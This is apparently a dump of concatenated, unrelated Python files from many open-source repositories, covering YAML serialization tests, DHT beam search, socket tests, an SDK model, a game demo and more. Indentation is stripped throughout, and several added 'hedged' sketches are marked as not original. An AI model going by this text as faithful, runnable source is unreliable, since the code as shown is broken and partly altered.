from simple_parsing.helpers.serialization import YamlSerializable
from test.conftest import silent
import yaml
@dataclass
class Point(YamlSerializable):
x: int = 0
y: int = 0
@dataclass
class Config(YamlSerializable):
name: str = "train"
bob: int = 123
some_float: float = 1.23
points: List[Point] = list_field()
def test_dumps():
p1 = Point(x=1, y=6)
p2 = Point(x=3, y=1)
config = Config(name="heyo", points=[p1, p2])
assert config.dumps() == textwrap.dedent(
"""\
bob: 123
name: heyo
points:
- x: 1
y: 6
- x: 3
y: 1
some_float: 1.23
"""
)
def test_dumps_loads():
p1 = Point(x=1, y=6)
p2 = Point(x=3, y=1)
config = Config(name="heyo", points=[p1, p2])
assert Config.loads(config.dumps()) == config
assert config == Config.loads(
textwrap.dedent(
"""\
bob: 123
name: heyo
points:
- x: 1
y: 6
- x: 3
y: 1
some_float: 1.23
"""
)
)
def test_save_yaml(HyperParameters, tmpdir: Path):
hparams = HyperParameters.setup("")
tmp_path = Path(tmpdir / "temp.yml")
hparams.save_yaml(tmp_path)
_hparams = HyperParameters.load_yaml(tmp_path)
assert hparams == _hparams
def test_save_json(HyperParameters, tmpdir: Path):
hparams = HyperParameters.setup("")
tmp_path = Path(tmpdir / "temp.json")
hparams.save_yaml(tmp_path)
_hparams = HyperParameters.load_yaml(tmp_path)
assert hparams == _hparams
def test_save_yml(HyperParameters, tmpdir: Path):
hparams = HyperParameters.setup("")
tmp_path = Path(tmpdir / "temp.yml")
hparams.save(tmp_path)
_hparams = HyperParameters.load(tmp_path)
assert hparams == _hparams
# def test_save_yml(HyperParameters, tmpdir: Path):
# hparams = HyperParameters.setup("")
# tmp_path = Path(tmpdir / "temp.pth")
# hparams.save(tmp_path)
# _hparams = HyperParameters.load(tmp_path)
# assert hparams == _hparams
|
tests/debugpy/common/test_socket.py | r3m0t/debugpy | 695 | 11090053 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import sys
from debugpy.common import sockets
class TestSocketServerReuse(object):
HOST1 = "127.0.0.1"
# NOTE: Windows allows loopback range 127/8. Some flavors of Linux support
# 127/8 range. Mac by default supports only 127/0. Configuring /etc/network/interface
# for this one test is overkill so use '0.0.0.0' on Mac instead.
HOST2 = "127.0.0.2" if sys.platform != "darwin" else "0.0.0.0"
def test_reuse_same_address_port(self):
# NOTE: This test should ensure that the same address:port cannot be reused by two
# sockets. This is to prevent accidental changes to socket options. In Windows
# SO_REUSEADDR flag allows two sockets to bind to same address:port combination.
# Windows should always use SO_EXCLUSIVEADDRUSE
sock1 = sockets.create_server(self.HOST1, 0)
try:
_, PORT1 = sock1.getsockname()
with pytest.raises(Exception):
sockets.create_server(self.HOST1, PORT1)
finally:
sockets.close_socket(sock1)
def test_reuse_same_port(self):
try:
sock1, sock2 = None, None
sock1 = sockets.create_server(self.HOST1, 0)
_, PORT1 = sock1.getsockname()
sock2 = sockets.create_server(self.HOST2, PORT1)
assert sock1.getsockname() == (self.HOST1, PORT1)
assert sock2.getsockname() == (self.HOST2, PORT1)
except Exception:
pytest.fail()
finally:
if sock1 is not None:
sockets.close_socket(sock1)
if sock2 is not None:
sockets.close_socket(sock2)
|
hivemind/dht/traverse.py | protagohhz/hivemind | 1,026 | 11090055 | """ Utility functions for crawling DHT nodes, used to get and store keys in a DHT """
import asyncio
import heapq
from collections import Counter
from typing import Any, Awaitable, Callable, Collection, Dict, List, Optional, Set, Tuple
from hivemind.dht.routing import DHTID
ROOT = 0 # alias for heap root
async def simple_traverse_dht(
query_id: DHTID,
initial_nodes: Collection[DHTID],
beam_size: int,
get_neighbors: Callable[[DHTID], Awaitable[Tuple[Collection[DHTID], bool]]],
visited_nodes: Collection[DHTID] = (),
) -> Tuple[Tuple[DHTID], Set[DHTID]]:
"""
Traverse the DHT graph using get_neighbors function, find :beam_size: nearest nodes according to DHTID.xor_distance.
:note: This is a simplified (but working) algorithm provided for documentation purposes. Actual DHTNode uses
`traverse_dht` - a generalization of this this algorithm that allows multiple queries and concurrent workers.
:param query_id: search query, find k_nearest neighbors of this DHTID
:param initial_nodes: nodes used to pre-populate beam search heap, e.g. [my_own_DHTID, ...maybe_some_peers]
:param beam_size: beam search will not give up until it exhausts this many nearest nodes (to query_id) from the heap
Recommended value: A beam size of k_nearest * (2-5) will yield near-perfect results.
:param get_neighbors: A function that returns neighbors of a given node and controls beam search stopping criteria.
async def get_neighbors(node: DHTID) -> neighbors_of_that_node: List[DHTID], should_stop: bool
If should_stop is True, beam search will halt and return k_nearest of whatever it found by then.
:param visited_nodes: beam search will neither call get_neighbors on these nodes, nor return them as nearest
:returns: a list of k nearest nodes (nearest to farthest), and a set of all visited nodes (including visited_nodes)
"""
visited_nodes = set(visited_nodes) # note: copy visited_nodes because we will add more nodes to this collection.
initial_nodes = [node_id for node_id in initial_nodes if node_id not in visited_nodes]
if not initial_nodes:
return (), visited_nodes
unvisited_nodes = [(distance, uid) for uid, distance in zip(initial_nodes, query_id.xor_distance(initial_nodes))]
heapq.heapify(unvisited_nodes) # nearest-first heap of candidates, unlimited size
nearest_nodes = [(-distance, node_id) for distance, node_id in heapq.nsmallest(beam_size, unvisited_nodes)]
heapq.heapify(
nearest_nodes
) # farthest-first heap of size beam_size, used for early-stopping and to select results
while len(nearest_nodes) > beam_size:
heapq.heappop(nearest_nodes)
visited_nodes |= set(initial_nodes)
upper_bound = -nearest_nodes[0][0] # distance to farthest element that is still in beam
was_interrupted = False # will set to True if host triggered beam search to stop via get_neighbors
while (not was_interrupted) and len(unvisited_nodes) != 0 and unvisited_nodes[0][0] <= upper_bound:
_, node_id = heapq.heappop(unvisited_nodes) # note: this --^ is the smallest element in heap (see heapq)
neighbors, was_interrupted = await get_neighbors(node_id)
neighbors = [node_id for node_id in neighbors if node_id not in visited_nodes]
visited_nodes.update(neighbors)
for neighbor_id, distance in zip(neighbors, query_id.xor_distance(neighbors)):
if distance <= upper_bound or len(nearest_nodes) < beam_size:
heapq.heappush(unvisited_nodes, (distance, neighbor_id))
heapq_add_or_replace = heapq.heappush if len(nearest_nodes) < beam_size else heapq.heappushpop
heapq_add_or_replace(nearest_nodes, (-distance, neighbor_id))
upper_bound = -nearest_nodes[0][0] # distance to beam_size-th nearest element found so far
return tuple(node_id for _, node_id in heapq.nlargest(beam_size, nearest_nodes)), visited_nodes
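async def _example_simple_traverse(initial_nodes: List[DHTID]) -> Tuple[Tuple[DHTID], Set[DHTID]]:
    """Hedged usage sketch (added illustration, not part of the original module).

    Runs :func:`simple_traverse_dht` over a fully connected in-memory toy graph built from
    ``initial_nodes``; it only demonstrates the expected shape of the ``get_neighbors`` callback.
    """
    neighbor_table = {node: list(initial_nodes) for node in initial_nodes}  # every node knows every node

    async def get_neighbors(node: DHTID) -> Tuple[List[DHTID], bool]:
        return neighbor_table.get(node, []), False  # second value False: never stop the search early

    query_id = initial_nodes[0]
    return await simple_traverse_dht(query_id, initial_nodes, beam_size=4, get_neighbors=get_neighbors)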
async def traverse_dht(
queries: Collection[DHTID],
initial_nodes: List[DHTID],
beam_size: int,
num_workers: int,
queries_per_call: int,
get_neighbors: Callable[[DHTID, Collection[DHTID]], Awaitable[Dict[DHTID, Tuple[Tuple[DHTID], bool]]]],
found_callback: Optional[Callable[[DHTID, List[DHTID], Set[DHTID]], Awaitable[Any]]] = None,
await_all_tasks: bool = True,
visited_nodes: Optional[Dict[DHTID, Set[DHTID]]] = (),
) -> Tuple[Dict[DHTID, List[DHTID]], Dict[DHTID, Set[DHTID]]]:
"""
Search the DHT for nearest neighbors to :queries: (based on DHTID.xor_distance). Use get_neighbors to request peers.
The algorithm can reuse intermediate results from each query to speed up search for other (similar) queries.
:param queries: a list of search queries, find beam_size neighbors for these DHTIDs
:param initial_nodes: nodes used to pre-populate beam search heap, e.g. [my_own_DHTID, ...maybe_some_peers]
:param beam_size: beam search will not give up until it visits this many nearest nodes (to query_id) from the heap
:param num_workers: run up to this many concurrent get_neighbors requests, each querying one peer for neighbors.
When selecting a peer to request neighbors from, workers try to balance concurrent exploration across queries.
A worker will expand the nearest candidate to a query with least concurrent requests from other workers.
If several queries have the same number of concurrent requests, prefer the one with nearest XOR distance.
:param queries_per_call: workers can pack up to this many queries in one get_neighbors call. These queries contain
the primary query (see num_workers above) and up to `queries_per_call - 1` nearest unfinished queries.
:param get_neighbors: A function that requests a given peer to find nearest neighbors for multiple queries
async def get_neighbors(peer, queries) -> {query1: ([nearest1, nearest2, ...], False), query2: ([...], True)}
For each query in queries, return nearest neighbors (known to a given peer) and a boolean "should_stop" flag
If should_stop is True, traverse_dht will no longer search for this query or request it from other peers.
The search terminates iff each query is either stopped via should_stop or finds beam_size nearest nodes.
:param found_callback: if specified, call this callback for each finished query the moment it finishes or is stopped
More specifically, run asyncio.create_task(found_callback(query, nearest_to_query, visited_for_query))
Using this callback allows one to process results faster before traverse_dht is finishes for all queries.
It is guaranteed that found_callback will be called exactly once on each query in queries.
:param await_all_tasks: if True, wait for all tasks to finish before returning, otherwise returns after finding
nearest neighbors and finishes the remaining tasks (callbacks and queries to known-but-unvisited nodes)
:param visited_nodes: for each query, do not call get_neighbors on these nodes, nor return them among nearest.
:note: the source code of this function can get tricky to read. Take a look at `simple_traverse_dht` function
for reference. That function implements a special case of traverse_dht with a single query and one worker.
:returns: a dict of nearest nodes, and another dict of visited nodes
nearest nodes: { query -> a list of up to beam_size nearest nodes, ordered nearest-first }
visited nodes: { query -> a set of all nodes that received requests for a given query }
"""
if len(queries) == 0:
return {}, dict(visited_nodes or {})
unfinished_queries = set(queries) # all queries that haven't triggered finish_search yet
candidate_nodes: Dict[DHTID, List[Tuple[int, DHTID]]] = {} # heap: unvisited nodes, ordered nearest-to-farthest
nearest_nodes: Dict[DHTID, List[Tuple[int, DHTID]]] = {} # heap: top-k nearest nodes, farthest-to-nearest
known_nodes: Dict[DHTID, Set[DHTID]] = {} # all nodes ever added to the heap (for deduplication)
visited_nodes: Dict[DHTID, Set[DHTID]] = dict(visited_nodes or {}) # nodes that were chosen for get_neighbors call
pending_tasks = set() # all active tasks (get_neighbors and found_callback)
active_workers = Counter({q: 0 for q in queries}) # count workers that search for this query
search_finished_event = asyncio.Event() # used to immediately stop all workers when the search is finished
heap_updated_event = asyncio.Event() # if a worker has no nodes to explore, it will await other workers
heap_updated_event.set()
# initialize data structures
for query in queries:
distances = query.xor_distance(initial_nodes)
candidate_nodes[query] = list(zip(distances, initial_nodes))
nearest_nodes[query] = list(zip([-d for d in distances], initial_nodes))
heapq.heapify(candidate_nodes[query])
heapq.heapify(nearest_nodes[query])
while len(nearest_nodes[query]) > beam_size:
heapq.heappop(nearest_nodes[query])
known_nodes[query] = set(initial_nodes)
visited_nodes[query] = set(visited_nodes.get(query, ()))
def heuristic_priority(heap_query: DHTID):
"""Workers prioritize expanding nodes that lead to under-explored queries (by other workers)"""
if has_candidates(heap_query):
# prefer candidates in heaps with least number of concurrent workers, break ties by distance to query
return active_workers[heap_query], candidate_nodes[heap_query][ROOT][0]
return float("inf"), float("inf") # try not to explore vertices with no candidates
def has_candidates(query: DHTID):
"""Whether this query's heap contains at least one candidate node that can be explored"""
return candidate_nodes[query] and candidate_nodes[query][ROOT][0] <= upper_bound(query)
def upper_bound(query: DHTID):
"""Any node that is farther from query than upper_bound(query) will not be added to heaps"""
return -nearest_nodes[query][ROOT][0] if len(nearest_nodes[query]) >= beam_size else float("inf")
def finish_search(query):
"""Remove query from a list of targets"""
unfinished_queries.remove(query)
if len(unfinished_queries) == 0:
search_finished_event.set()
if found_callback:
nearest_neighbors = [peer for _, peer in heapq.nlargest(beam_size, nearest_nodes[query])]
pending_tasks.add(asyncio.create_task(found_callback(query, nearest_neighbors, set(visited_nodes[query]))))
async def worker():
while unfinished_queries:
# select the heap based on priority
chosen_query: DHTID = min(unfinished_queries, key=heuristic_priority)
# if there are no peers to explore...
if not has_candidates(chosen_query):
other_workers_pending = active_workers.most_common(1)[0][1] > 0
if other_workers_pending: # ... wait for other workers (if any) or add more peers
heap_updated_event.clear()
await heap_updated_event.wait()
continue
else: # ... or if there is no hope of new nodes, finish search immediately
for query in list(unfinished_queries):
finish_search(query)
break
# select vertex to be explored
chosen_distance_to_query, chosen_peer = heapq.heappop(candidate_nodes[chosen_query])
if chosen_peer in visited_nodes[chosen_query] or chosen_distance_to_query > upper_bound(chosen_query):
if chosen_distance_to_query > upper_bound(chosen_query) and active_workers[chosen_query] == 0:
finish_search(chosen_query)
continue
# find additional queries to pack in the same request
possible_additional_queries = [
query
for query in unfinished_queries
if query != chosen_query and chosen_peer not in visited_nodes[query]
]
queries_to_call = [chosen_query] + heapq.nsmallest(
queries_per_call - 1, possible_additional_queries, key=chosen_peer.xor_distance
)
# update priorities for subsequent workers
active_workers.update(queries_to_call)
for query_to_call in queries_to_call:
visited_nodes[query_to_call].add(chosen_peer)
# get nearest neighbors (over network) and update search heaps. Abort if search finishes early
get_neighbors_task = asyncio.create_task(get_neighbors(chosen_peer, queries_to_call))
pending_tasks.add(get_neighbors_task)
await asyncio.wait([get_neighbors_task, search_finished_event.wait()], return_when=asyncio.FIRST_COMPLETED)
if search_finished_event.is_set():
break # other worker triggered finish_search, we exit immediately
pending_tasks.remove(get_neighbors_task)
# add nearest neighbors to their respective heaps
for query, (neighbors_for_query, should_stop) in get_neighbors_task.result().items():
if should_stop and (query in unfinished_queries):
finish_search(query)
if query not in unfinished_queries:
continue # either we finished search or someone else did while we awaited
for neighbor in neighbors_for_query:
if neighbor not in known_nodes[query]:
known_nodes[query].add(neighbor)
distance = query.xor_distance(neighbor)
if distance <= upper_bound(query) or len(nearest_nodes[query]) < beam_size:
heapq.heappush(candidate_nodes[query], (distance, neighbor))
if len(nearest_nodes[query]) < beam_size:
heapq.heappush(nearest_nodes[query], (-distance, neighbor))
else:
heapq.heappushpop(nearest_nodes[query], (-distance, neighbor))
# we finished processing a request, update priorities for other workers
active_workers.subtract(queries_to_call)
heap_updated_event.set()
workers = [asyncio.create_task(worker()) for _ in range(num_workers)]
try:
# spawn all workers and wait for them to terminate; workers terminate after exhausting unfinished_queries
await asyncio.wait(workers, return_when=asyncio.FIRST_COMPLETED)
assert len(unfinished_queries) == 0 and search_finished_event.is_set()
if await_all_tasks:
await asyncio.gather(*pending_tasks)
nearest_neighbors_per_query = {
query: [peer for _, peer in heapq.nlargest(beam_size, nearest_nodes[query])] for query in queries
}
return nearest_neighbors_per_query, visited_nodes
except asyncio.CancelledError as e:
for worker in workers:
worker.cancel()
raise e
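# --- Hedged usage sketch (not part of the original module) ---
# A minimal way to drive traverse_dht with an in-memory adjacency table instead
# of real network calls. The keyword names follow the docstring above; everything
# else here (routing_table, demo_traverse) is a hypothetical stand-in.
async def demo_traverse(routing_table, query, initial_nodes, beam_size=4):
    async def get_neighbors(peer, queries):
        # must return {query -> (list of neighbor DHTIDs, should_stop)} for each query
        return {q: (routing_table.get(peer, []), False) for q in queries}
    nearest, visited = await traverse_dht(
        queries=[query], initial_nodes=initial_nodes, beam_size=beam_size,
        num_workers=1, queries_per_call=1, get_neighbors=get_neighbors)
    return nearest[query], visited[query]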
|
src/byro/common/templatetags/qrcode_inline.py | mv-idatalytics/jenkins-byro | 114 | 11090091 | import base64
import io
import qrcode
from django import template
register = template.Library()
@register.filter
def qrcode_inline(value):
qr = qrcode.QRCode(
version=None, box_size=2, error_correction=qrcode.constants.ERROR_CORRECT_Q
)
qr.add_data(value)
qr.make(fit=True)
img = qr.make_image()
with io.BytesIO() as output:
img.save(output, format="PNG")
return "data:image/png;base64,{}".format(
base64.b64encode(output.getvalue()).decode("us-ascii")
)
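# Hedged usage note (not part of the original file): in a template the filter
# would typically feed an <img> tag, e.g.
#   {% load qrcode_inline %}
#   <img src="{{ payment_uri|qrcode_inline }}" alt="QR code">
# It can also be exercised directly in Python, as below.
def _example_data_uri():
    # returns a "data:image/png;base64,..." string suitable for inline embedding
    return qrcode_inline("https://example.org/donate")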
|
lightning/types/base.py | lightning-viz/lightning-python | 176 | 11090110 | from lightning import Visualization, VisualizationLocal
import requests
import six
class Base(Visualization, VisualizationLocal):
_name = 'base'
_options = {
'width': {'default': None},
'height': {'default': None},
'description': {'default': None}
}
_doc = """
width : int, optional, default=None
Width of visualization in pixels.
height : int, optional, default=None
Height of visualization in pixels.
description : str, optional, default=None
Markdown formatted text to show with visualization
when displayed in a Lightning server.
"""
_data_dict_inputs = {}
@classmethod
def _check_unkeyed_arrays(cls, key, val):
if key not in cls._data_dict_inputs:
return val
if not isinstance(val, list):
raise Exception("Must provide a list")
if len(val) == 0:
return val
if isinstance(val[0], dict) and isinstance(val[-1], dict):
return val
if isinstance(val[0], list) and isinstance(val[-1], list):
# if both the first and last elements are lists
out = []
mapping = cls._data_dict_inputs[key]
for l in val:
out.append(dict(zip(mapping, l)))
return out
@staticmethod
def _ensure_dict_or_list(x):
if isinstance(x, dict):
return x
if isinstance(x, list):
return x
if isinstance(x, str):
return x
if isinstance(x, (int, float, complex)):
return x
try:
# convert numpy arrays to lists
return x.tolist()
except Exception:
pass
# add other data type conversions here
raise Exception("Could not convert to correct data type")
@classmethod
def _clean_data(cls, *args, **kwargs):
"""
Convert raw data into a dictionary with plot-type specific methods.
The result of the cleaning operation should be a dictionary.
If the dictionary contains a 'data' field it will be passed directly
(ensuring appropriate formatting). Otherwise, it should be a
dictionary of data-type specific array data (e.g. 'points',
'timeseries'), which will be labeled appropriately
(see _check_unkeyed_arrays).
"""
datadict = cls.clean(*args, **kwargs)
if 'data' in datadict:
data = datadict['data']
data = cls._ensure_dict_or_list(data)
else:
data = {}
for key in datadict:
if key == 'images':
data[key] = datadict[key]
else:
d = cls._ensure_dict_or_list(datadict[key])
data[key] = cls._check_unkeyed_arrays(key, d)
return data
@classmethod
def _clean_options(cls, **kwargs):
options = {}
description = None
if hasattr(cls, '_options'):
for key, value in six.iteritems(kwargs):
if key in cls._options:
lgn_option = cls._options[key].get('name', key)
options[lgn_option] = value
if key == 'description':
description = value
return options, description
@classmethod
def _baseplot_local(cls, type, *args, **kwargs):
data = cls._clean_data(*args)
options, description = cls._clean_options(**kwargs)
payload = {'type': type, 'options': options}
if 'images' in data:
payload['images'] = data['images']
else:
payload['data'] = data
viz = VisualizationLocal._create(**payload)
return viz
@classmethod
def _baseplot(cls, session, type, *args, **kwargs):
"""
Base method for plotting data and images.
Applies a plot-type specific cleaning operation to generate
a dictionary with the data, then creates a visualization with the data.
Expects a session and a type, followed by all plot-type specific
positional and keyword arguments, which will be handled by the clean
method of the given plot type.
If the dictionary contains only images, or only non-image data,
they will be passed on their own. If the dictionary contains
both images and non-image data, the images will be appended
to the visualization.
"""
if not type:
raise Exception("Must provide a plot type")
options, description = cls._clean_options(**kwargs)
data = cls._clean_data(*args)
if 'images' in data and len(data) > 1:
images = data['images']
del data['images']
viz = cls._create(session, data=data, type=type, options=options, description=description)
first_image, remaining_images = images[0], images[1:]
viz._append_image(first_image)
for image in remaining_images:
viz._append_image(image)
elif 'images' in data:
images = data['images']
viz = cls._create(session, images=images, type=type, options=options, description=description)
else:
viz = cls._create(session, data=data, type=type, options=options, description=description)
return viz
def update(self, *args, **kwargs):
"""
Base method for updating data.
Applies a plot-type specific cleaning operation, then
updates the data in the visualization.
"""
data = self._clean_data(*args, **kwargs)
if 'images' in data:
images = data['images']
for img in images:
self._update_image(img)
else:
self._update_data(data=data)
def append(self, *args, **kwargs):
"""
Base method for appending data.
Applies a plot-type specific cleaning operation, then
appends data to the visualization.
"""
data = self._clean_data(*args, **kwargs)
if 'images' in data:
images = data['images']
for img in images:
self._append_image(img)
else:
self._append_data(data=data)
def _get_user_data(self):
"""
Base method for retrieving user data from a viz.
"""
url = self.session.host + '/sessions/' + str(self.session.id) + '/visualizations/' + str(self.id) + '/settings/'
r = requests.get(url)
if r.status_code == 200:
content = r.json()
else:
raise Exception('Error retrieving user data from server')
return content
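# Hedged illustration (not part of the library source): a concrete plot type
# subclasses Base and implements `clean`, returning a dict of data arrays.
# The `ScatterSketch` name and the 'points' key below are assumptions made only
# for this sketch; _clean_data/_check_unkeyed_arrays then label the unkeyed
# inner lists with the field names from _data_dict_inputs.
class ScatterSketch(Base):
    _name = 'scatter-sketch'
    _data_dict_inputs = {'points': ['x', 'y']}
    @classmethod
    def clean(cls, x, y):
        # lists of [x, y] pairs are turned into [{'x': ..., 'y': ...}, ...]
        return {'points': [[float(a), float(b)] for a, b in zip(x, y)]}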
|
hacking/tests/__init__.py | UbuntuEvangelist/hacking | 187 | 11090112 | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import fixtures
import testtools
_TRUE_VALUES = ('True', 'true', '1', 'yes')
class TestCase(testtools.TestCase):
"""Test case base class for all unit tests."""
def setUp(self):
"""Run before each test method to initialize test environment."""
super(TestCase, self).setUp()
test_timeout = os.environ.get('OS_TEST_TIMEOUT', 0)
try:
test_timeout = int(test_timeout)
except ValueError:
# If timeout value is invalid do not set a timeout.
test_timeout = 0
if test_timeout > 0:
self.useFixture(fixtures.Timeout(test_timeout, gentle=True))
if os.environ.get('OS_STDOUT_CAPTURE') in _TRUE_VALUES:
stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
if os.environ.get('OS_STDERR_CAPTURE') in _TRUE_VALUES:
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
def assertCheckFails(self, check_func, *args, **kwargs):
if not list(check_func(*args, **kwargs)):
raise AssertionError("Check %s did not fail." %
check_func.__name__)
def assertCheckPasses(self, check_func, *args, **kwargs):
try:
self.assertCheckFails(check_func, *args, **kwargs)
except AssertionError:
return
else:
raise AssertionError("Check %s failed." % check_func.__name__)
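# Hedged example (not in the original file): a derived test can exercise a
# flake8/hacking-style check, i.e. a function that yields (offset, message)
# tuples when it flags a logical line. `no_todo_comments` is a made-up stand-in.
class ExampleCheckTest(TestCase):
    def test_todo_comment_check(self):
        def no_todo_comments(logical_line):
            if "TODO" in logical_line:
                yield 0, "X000: avoid TODO comments"
        self.assertCheckFails(no_todo_comments, "x = 1  # TODO fix")
        self.assertCheckPasses(no_todo_comments, "x = 1")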
|
safe_rl/pg/utils.py | florisdenhengst/safety-starter-agents | 216 | 11090136 | <reponame>florisdenhengst/safety-starter-agents
import numpy as np
import scipy.signal
EPS = 1e-8
def combined_shape(length, shape=None):
if shape is None:
return (length,)
return (length, shape) if np.isscalar(shape) else (length, *shape)
def keys_as_sorted_list(dict):
return sorted(list(dict.keys()))
def values_as_sorted_list(dict):
return [dict[k] for k in keys_as_sorted_list(dict)]
def discount_cumsum(x, discount):
"""
magic from rllab for computing discounted cumulative sums of vectors.
input:
vector x,
[x0,
x1,
x2]
output:
[x0 + discount * x1 + discount^2 * x2,
x1 + discount * x2,
x2]
"""
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
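# Hedged sketch (not part of the original module): the lfilter trick above can
# be cross-checked against the direct backward recursion for a short vector,
# e.g. discount_cumsum(np.array([1., 1., 1.]), 0.9) -> [2.71, 1.9, 1.0].
def discount_cumsum_reference(x, discount):
    out, running = np.zeros(len(x)), 0.0
    for i in reversed(range(len(x))):
        running = x[i] + discount * running  # r_t + gamma * G_{t+1}
        out[i] = running
    return out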
|
Calibration/TkAlCaRecoProducers/python/AlcaBeamSpotProducerHP_cff.py | ckamtsikis/cmssw | 852 | 11090151 | import FWCore.ParameterSet.Config as cms
from Calibration.TkAlCaRecoProducers.AlcaBeamSpotProducerHP_cfi import alcaBeamSpotProducerHP
alcaBeamSpotHP = cms.Sequence( alcaBeamSpotProducerHP )
|
custom_components/hacs/helpers/network.py | svkowalski/HAcore_QNAP | 297 | 11090174 | """Verify network."""
from socket import gaierror
from integrationhelper import Logger
def internet_connectivity_check(host="api.github.com"):
"""Verify network connectivity."""
return True
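# Hedged sketch (not part of the original file): the unused imports above hint
# that a real probe would resolve the host and catch DNS failures, roughly:
# def _probe(host="api.github.com"):
#     import socket
#     try:
#         socket.gethostbyname(host)
#         return True
#     except gaierror:
#         return False
# (the helper name `_probe` is an assumption for illustration only)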
|
tests/bytecode/mp-tests/yield2.py | LabAixBidouille/micropython | 303 | 11090176 | <filename>tests/bytecode/mp-tests/yield2.py
def f():
yield from a
yield from (a, b)
yield from f(a)
lambda:(yield)
lambda:(yield 1) + 2
|
alipay/aop/api/domain/AlipayUserPassTemplateCreateModel.py | alipay/alipay-sdk-python-all | 213 | 11090186 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.TemplateEvoucherDTO import TemplateEvoucherDTO
from alipay.aop.api.domain.TemplateFileDTO import TemplateFileDTO
from alipay.aop.api.domain.TemplateImageDTO import TemplateImageDTO
from alipay.aop.api.domain.TemplateMerchantDTO import TemplateMerchantDTO
from alipay.aop.api.domain.TemplatePlatformDTO import TemplatePlatformDTO
from alipay.aop.api.domain.TemplateStyleDTO import TemplateStyleDTO
class AlipayUserPassTemplateCreateModel(object):
def __init__(self):
self._evoucher_info = None
self._file_info = None
self._image = None
self._merchant = None
self._platform = None
self._style = None
self._unique_id = None
@property
def evoucher_info(self):
return self._evoucher_info
@evoucher_info.setter
def evoucher_info(self, value):
if isinstance(value, TemplateEvoucherDTO):
self._evoucher_info = value
else:
self._evoucher_info = TemplateEvoucherDTO.from_alipay_dict(value)
@property
def file_info(self):
return self._file_info
@file_info.setter
def file_info(self, value):
if isinstance(value, TemplateFileDTO):
self._file_info = value
else:
self._file_info = TemplateFileDTO.from_alipay_dict(value)
@property
def image(self):
return self._image
@image.setter
def image(self, value):
if isinstance(value, TemplateImageDTO):
self._image = value
else:
self._image = TemplateImageDTO.from_alipay_dict(value)
@property
def merchant(self):
return self._merchant
@merchant.setter
def merchant(self, value):
if isinstance(value, TemplateMerchantDTO):
self._merchant = value
else:
self._merchant = TemplateMerchantDTO.from_alipay_dict(value)
@property
def platform(self):
return self._platform
@platform.setter
def platform(self, value):
if isinstance(value, TemplatePlatformDTO):
self._platform = value
else:
self._platform = TemplatePlatformDTO.from_alipay_dict(value)
@property
def style(self):
return self._style
@style.setter
def style(self, value):
if isinstance(value, TemplateStyleDTO):
self._style = value
else:
self._style = TemplateStyleDTO.from_alipay_dict(value)
@property
def unique_id(self):
return self._unique_id
@unique_id.setter
def unique_id(self, value):
self._unique_id = value
def to_alipay_dict(self):
params = dict()
if self.evoucher_info:
if hasattr(self.evoucher_info, 'to_alipay_dict'):
params['evoucher_info'] = self.evoucher_info.to_alipay_dict()
else:
params['evoucher_info'] = self.evoucher_info
if self.file_info:
if hasattr(self.file_info, 'to_alipay_dict'):
params['file_info'] = self.file_info.to_alipay_dict()
else:
params['file_info'] = self.file_info
if self.image:
if hasattr(self.image, 'to_alipay_dict'):
params['image'] = self.image.to_alipay_dict()
else:
params['image'] = self.image
if self.merchant:
if hasattr(self.merchant, 'to_alipay_dict'):
params['merchant'] = self.merchant.to_alipay_dict()
else:
params['merchant'] = self.merchant
if self.platform:
if hasattr(self.platform, 'to_alipay_dict'):
params['platform'] = self.platform.to_alipay_dict()
else:
params['platform'] = self.platform
if self.style:
if hasattr(self.style, 'to_alipay_dict'):
params['style'] = self.style.to_alipay_dict()
else:
params['style'] = self.style
if self.unique_id:
if hasattr(self.unique_id, 'to_alipay_dict'):
params['unique_id'] = self.unique_id.to_alipay_dict()
else:
params['unique_id'] = self.unique_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayUserPassTemplateCreateModel()
if 'evoucher_info' in d:
o.evoucher_info = d['evoucher_info']
if 'file_info' in d:
o.file_info = d['file_info']
if 'image' in d:
o.image = d['image']
if 'merchant' in d:
o.merchant = d['merchant']
if 'platform' in d:
o.platform = d['platform']
if 'style' in d:
o.style = d['style']
if 'unique_id' in d:
o.unique_id = d['unique_id']
return o
|
doc/tutorials/shader_toy/shadertoy_demo_1.py | janscas/arcade | 824 | 11090190 | <reponame>janscas/arcade
import arcade
# Derive an application window from Arcade's parent Window class
class MyGame(arcade.Window):
def __init__(self):
# Call the parent constructor
super().__init__(width=1920, height=1080)
def on_draw(self):
# Clear the screen
self.clear()
if __name__ == "__main__":
MyGame()
arcade.run()
|
data_collection/gazette/spiders/sc_jupia.py | kaiocp/querido-diario | 454 | 11090239 | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScJupiaSpider(FecamGazetteSpider):
name = "sc_jupia"
FECAM_QUERY = "cod_entidade:143"
TERRITORY_ID = "4209177"
|
smdebug/profiler/analysis/notebook_utils/heatmap.py | jsspric/sagemaker-debugger | 133 | 11090243 | <gh_stars>100-1000
# Standard Library
import re
from copy import deepcopy
# Third Party
import bokeh
import numpy as np
from bokeh.io import output_notebook, show
from bokeh.models import ColumnDataSource, HoverTool
from bokeh.models.glyphs import Image
from bokeh.models.tickers import FixedTicker
from bokeh.plotting import figure, show
output_notebook(hide_banner=True)
class Heatmap:
def __init__(
self,
metrics_reader,
select_metrics=[],
starttime=0,
endtime=None,
select_dimensions=[".*CPU", ".*GPU"],
select_events=[".*"],
plot_height=350,
show_workers=True,
):
self.select_dimensions = select_dimensions
self.select_events = select_events
self.show_workers = show_workers
self.metrics_reader = metrics_reader
self.available_dimensions = []
self.available_events = []
